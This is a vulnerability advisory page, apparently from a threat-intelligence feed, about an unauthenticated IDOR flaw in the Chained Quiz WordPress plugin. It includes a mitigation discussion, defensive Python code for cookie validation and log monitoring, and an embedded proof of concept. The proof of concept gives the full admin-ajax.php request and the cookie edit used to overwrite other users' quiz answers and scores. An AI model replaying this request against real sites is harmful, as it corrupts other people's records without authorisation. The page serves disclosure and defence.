Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
AI Analysis
Technical Summary
The Chained Quiz 1.3.5 application contains an Insecure Direct Object Reference (IDOR) vulnerability that can be exploited without authentication by manipulating cookie values. IDOR vulnerabilities occur when an application uses user-supplied input to access objects directly without proper authorization checks, allowing attackers to access or modify data belonging to other users or administrative functions. In this case, the vulnerability is triggered via cookie manipulation, which means an attacker can craft or alter cookies to gain unauthorized access to restricted resources or data within the Chained Quiz application. Since no authentication is required, the attack surface is broad, and exploitation can be performed remotely without user interaction. The availability of exploit code (not in a specific programming language but as text) lowers the barrier for attackers to develop functional exploits. Although the affected versions list is empty, the title and description specify version 1.3.5 as vulnerable. No patches or fixes are currently linked, indicating that organizations must rely on mitigation strategies until an official update is released. This vulnerability primarily threatens the confidentiality and integrity of data managed by the quiz application, potentially exposing sensitive user information or allowing unauthorized modifications to quiz content or results.
Potential Impact
For European organizations, especially those in education, training, or certification sectors using Chained Quiz 1.3.5, this vulnerability poses significant risks. Unauthorized access could lead to exposure of personal data, quiz answers, or administrative settings, undermining data confidentiality and integrity. Attackers might manipulate quiz results or access sensitive user information, damaging organizational reputation and violating data protection regulations such as GDPR. The unauthenticated nature of the exploit increases the likelihood of attacks, potentially leading to widespread compromise if the software is widely deployed. Additionally, the lack of patches means organizations must act proactively to prevent exploitation. Disruption of quiz services could also impact availability indirectly if attackers modify or delete critical data. Overall, the threat could result in regulatory penalties, loss of user trust, and operational disruptions within affected European institutions.
Mitigation Recommendations
Organizations should immediately audit their use of Chained Quiz software to identify installations of version 1.3.5. Until an official patch is available, implement strict web application firewall (WAF) rules to detect and block suspicious cookie manipulations targeting the quiz application. Enforce server-side validation of all object references, ensuring that access control checks are performed on every request regardless of cookie values. Limit cookie scope and use secure, HttpOnly flags to reduce the risk of tampering. Monitor logs for unusual access patterns or repeated unauthorized attempts. Consider isolating the quiz application behind VPN or internal networks to reduce exposure. Engage with the software vendor or community to obtain updates or patches promptly. Finally, educate administrators and users about the risks and encourage prompt reporting of anomalies.
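The server-side check recommended above, as an added Python model (not code from the plugin or from the advisory). Because the default configuration has no logged-in user to compare ownership against, this sketch binds the completion ID to the quiz with an HMAC and scores answers on the server. `SERVER_KEY`, `ATTEMPTS`, `ANSWER_KEY` and all function names are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # assumption: secret that never leaves the server
ATTEMPTS = {}                         # completion_id -> row; stands in for the attempts table
ANSWER_KEY = {1: {"0": 0, "1": 10}}   # constructed: quiz_id -> answer -> points


def tag_for(quiz_id, completion_id):
    """HMAC binding a completion id to the quiz it was issued for."""
    msg = f"{quiz_id}:{completion_id}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def new_attempt(quiz_id):
    """Create an attempt and return the (cookie name, cookie value) to set."""
    completion_id = len(ATTEMPTS) + 1  # predictable auto-increment id, as in the advisory
    ATTEMPTS[completion_id] = {"quiz_id": quiz_id, "answer": None, "points": 0}
    return f"chained_completion_id{quiz_id}", f"{completion_id}.{tag_for(quiz_id, completion_id)}"


def submit_vulnerable(cookie_value, answer, points):
    """Pattern from the advisory: the bare id in the cookie selects the row to update."""
    ATTEMPTS[int(cookie_value)].update(answer=answer, points=points)
    return True


def submit_hardened(quiz_id, cookie_value, answer):
    """Update only an attempt whose cookie carries a valid server-issued tag."""
    raw_id, _, tag = cookie_value.partition(".")
    if not (raw_id.isascii() and raw_id.isdigit()):
        return False
    completion_id = int(raw_id)
    expected = tag_for(quiz_id, completion_id)
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return False  # id was altered or never issued for this quiz
    attempt = ATTEMPTS.get(completion_id)
    if attempt is None or attempt["quiz_id"] != quiz_id:
        return False
    # Points come from the server-side answer key, never from the request.
    points = ANSWER_KEY.get(quiz_id, {}).get(answer, 0)
    attempt.update(answer=answer, points=points)
    return True
```

A cookie whose ID has been changed no longer matches its tag, so the update is refused before any row is read.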
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Belgium, Italy, Spain
Indicators of Compromise
- exploit-code:

# Exploit Title: Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
# Date: 19-12-2025
# Exploit Author: Karuppiah Sabari Kumar(0xsabre)
# Vendor Homepage: https://wordpress.org/plugins/chained-quiz/
# Software Link: https://downloads.wordpress.org/plugin/chained-quiz.1.3.3.zip
# Version: <= 1.3.3
# Tested on: WordPress / Linux
# CVE: CVE-2025-10493

------------------------------------------------------------

## Vulnerability Type

Insecure Direct Object Reference (IDOR) / Improper Authorization

------------------------------------------------------------

## Description

The Chained Quiz plugin stores each quiz attempt using a predictable, auto-incrementing database ID (completion_id) and exposes this value directly in a client-side cookie named:

    chained_completion_id<quiz_id>

When submitting or re-submitting quiz answers via admin-ajax.php, the server updates the quiz attempt record based solely on this cookie value, without verifying that the attempt belongs to the currently authenticated user.

No authentication is required to exploit this vulnerability when the plugin is used with default settings.

The server retrieves the quiz attempt directly using the completion_id from the cookie and performs an UPDATE query without verifying ownership. As a result, an attacker can hijack or tamper with other users’ quiz attempts by guessing or enumerating valid completion_id values and replaying answer submissions.

------------------------------------------------------------

## Affected Component

Quiz submission and results handling functionality via admin-ajax.php

------------------------------------------------------------

## Proof of Concept (PoC)

### Step 1: Victim user submission

A user completes a quiz. The submission is stored using a completion ID and associated with the user’s session via a cookie, for example:

    chained_completion_id1=2

------------------------------------------------------------

### Step 2: Attacker interception

The attacker completes the same quiz and intercepts their own submission request using a proxy or browser developer tools.

Example request:

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: localhost
    Cookie: chained_completion_id1=1
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded

    answer=0&question_id=1&quiz_id=1&post_id=117&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1

------------------------------------------------------------

### Step 3: Tampering

The attacker modifies the cookie value to match another user’s quiz attempt, for example:

    chained_completion_id1=2

The attacker may also modify parameters such as "answer" or "points" to manipulate quiz responses or scores. The modified request is then sent to the server.

------------------------------------------------------------

### Step 4: Result

The server overwrites the victim user’s quiz submission, including answers and points, without validating ownership of the completion ID.

------------------------------------------------------------

## Impact

An attacker can arbitrarily modify quiz answers, scores, or results belonging to other users. This results in an integrity violation of quiz data and allows unauthorized manipulation of finalized quiz attempts.

In environments where quiz results are used for assessments, leaderboards, or certificates, this can undermine trust in the platform and affect any downstream integrations that rely on quiz completion data.

------------------------------------------------------------

## CWE

- CWE-639: Authorization Bypass Through User-Controlled Key
- CWE-285: Improper Authorization

------------------------------------------------------------
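For the log monitoring recommended in the mitigation section, the following added Python example (not part of the advisory or the plugin) flags the two server-side traces the request pattern above leaves: one completion ID written to from several client addresses, and one client submitting under several completion IDs for the same quiz. The log format and sample lines are constructed, and it assumes the web server is configured to record the Cookie header, which default access logs do not.

```python
import re
from collections import defaultdict

# Constructed sample lines in an assumed custom access-log format that records
# the Cookie header for POST requests to admin-ajax.php.
SAMPLE_LOG = """\
198.51.100.10 [25/Dec/2025:10:00:01] "POST /wp-admin/admin-ajax.php" cookie="chained_completion_id1=2"
203.0.113.7 [25/Dec/2025:10:03:12] "POST /wp-admin/admin-ajax.php" cookie="chained_completion_id1=1"
203.0.113.7 [25/Dec/2025:10:03:40] "POST /wp-admin/admin-ajax.php" cookie="other=x; chained_completion_id1=2"
198.51.100.22 [25/Dec/2025:10:05:00] "POST /wp-admin/admin-ajax.php" cookie="chained_completion_id2=3"
"""

LINE_RE = re.compile(r'^(\S+) .*"POST /wp-admin/admin-ajax\.php" cookie="([^"]*)"')
COOKIE_RE = re.compile(r'(?:^|;\s*)chained_completion_id(\d+)=(\d+)')


def parse(log_text):
    """Yield (client, quiz_id, completion_id) for each quiz cookie in the log."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            for quiz_id, completion_id in COOKIE_RE.findall(m.group(2)):
                yield m.group(1), int(quiz_id), int(completion_id)


def shared_attempts(log_text):
    """Attempts written to by more than one client, clients in first-seen order."""
    seen = defaultdict(list)
    for client, quiz_id, completion_id in parse(log_text):
        if client not in seen[(quiz_id, completion_id)]:
            seen[(quiz_id, completion_id)].append(client)
    return {k: v for k, v in seen.items() if len(v) > 1}


def multi_id_clients(log_text, threshold=2):
    """Clients that submitted under `threshold` or more ids for one quiz."""
    ids = defaultdict(set)
    for client, quiz_id, completion_id in parse(log_text):
        ids[(client, quiz_id)].add(completion_id)
    return {k: sorted(v) for k, v in ids.items() if len(v) >= threshold}
```

Both signals are heuristics: shared NAT addresses and legitimate quiz retakes produce the same traces, so raise `threshold` and correlate with timestamps before acting on a hit.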
Technical Details
- Edb Id: 52464
- Has Exploit Code: true
- Code Language: text
Threat ID: 694d89022ffa995e0c012b32
Added to database: 12/25/2025, 6:57:06 PM
Last enriched: 12/25/2025, 6:57:31 PM
Last updated: 12/26/2025, 4:42:29 AM